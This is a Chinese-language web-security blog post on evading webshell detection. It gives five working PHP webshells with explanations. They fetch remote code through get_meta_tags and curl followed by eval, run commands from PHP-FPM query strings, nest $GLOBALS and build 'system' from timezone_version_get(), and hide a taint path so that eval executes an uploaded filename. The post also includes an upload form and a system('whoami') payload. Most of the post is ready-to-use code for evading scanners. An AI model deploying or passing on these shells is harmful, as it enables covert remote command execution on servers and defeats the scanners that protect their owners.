当前位置：首页 > web >正文

WEB安全--RCE--webshell bypass

web 2025/5/7 2:31:56

一、get_meta_tags

原理：

用PHP的get_meta_tags()函数获取远程服务器中html页面的meta标签中的值，我们将meta的值设为如下命令执行语句，就能被webshell接收并拼接成

system(whoami)；

这样的形式在受害机上执行。

服务器内容：

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="a" content="system"><meta name="b" content="whoami"><title>Document</title>
</head>
<body><div>webshell bypass</div>
</body>
</html>

webshell：

<?php
get_meta_tags("http://127.0.0.1/rce/bypass.html")["a"](get_meta_tags("http://127.0.0.1/rce/bypass.html")["b"]);

访问webshell执行命令：

二、curl

原理：

使用PHP的curl命令访问远程服务器的txt文件，将文件内容赋值给$output变量，并用

eval($output)

这种方式执行txt文件中的内容system(whoami);实现命令执行。

1.txt：

system(whoami);

webshell：

<?php
$url="http://127.0.0.1/rce/1.txt";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
//curl_setopt($ch,CURLOPT_HTTPHEADER,$headerArray);
$output = curl_exec($ch);
curl_close($ch);
echo $output;
eval($output);
?>

三、fpm_get_status

原理：

fpm_get_status用于获取 PHP-FPM（FastCGI Process Manager）的状态信息。

我们可以在打印fpm_get_status()信息时传参，这样其中的query-string就会接收到我们传递的值

并且在执行的时候可能是不同的进程，也就是你所在的数组可能是数组0也可能是数组1，所以进行for循环，循环出来就可以百分百执行命令

webshell：

<?php
foreach(fpm_get_status()["procs"] as $val){system($val["query-string"]);
}

payload：

127.0.0.1/rce/bypass.php?whoami

四、$GLOBALS

原理：

当查杀引擎对$GLOBALS全局变量传参点进行了检测，但是没有严格执行递归检测，就可以通过获取多个$GLOBALS参数干扰检测

然后用[_GET]获取我们URL中传递的命令

由于system会被拦截，所以通过substr(timezone_version_get(),2)的方式获取system

最后通过system执行命令

webshell：

<?php
$m=($GLOBALS[GLOBALS][GLOBALS][GLOBALS][GLOBALS][GLOBALS][GLOBALS][GLOBALS][GLOBALS][GLOBALS
][_GET][b]);
substr(timezone_version_get(),2)($m);

payload：

127.0.0.1/rce/bypass.php?b=whoami

五、隐藏污点

webshell：

<?php
$b = "111";
$c = "222";
if(get_cfg_var('error_reporting')>0){$b="#";
}
$a = array( "one"=>$c,"two"=>&$c );
$url = "http://127.0.0.1".$b."?a=1";
$d =parse_url($url);
if($d['query']){$c="echo 111;";
}
else{$c=$_FILES['useraccount']['name'];
}
var_dump($a["two"]);
eval($a["two"]);
?>

查杀引擎检测代码走的路径：

$b="111" $c="111"

==> $url="http://127.0.0.1/111?a=1"

==> $d['query']="a=1"

==> $c="echo 111"

==> $a[two]="echo 111"

==> eval(echo 111)

实际访问时代码走的路径：

$b="111" $c="111"

==> $url="http://127.0.0.1/#?a=1"

==> $d['query']=NULL

==> $c=$_FILES['useraccount']['name']

==> $a[two]=$_FILES['useraccount']['name']

==> eval($_FILES['useraccount']['name'])

主要原因是这一步get_cfg_var('error_reporting')，当动态查杀引擎没有配置error_reporting这个参数，而真实环境中配置了该参数，那么走向就会截然不同，在上面代码中就会让 $b="#"

$d =parse_url($url)是以数组形式获取url中的各个值，不过当url中有#时，其后面的内容就会被忽略，所以$d['query']=NULL，于是就走到else判断中去了

配合文件上传：

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>upload</title>
</head>
<body><form action="bypass.php" method="post" enctype="multipart/form-data"><input type="file" name="useraccount"><input type="submit" value="upload"></form>
</body>
</html>

注意：<input type="file" name="useraccount">

修改filename字段：system('whoami');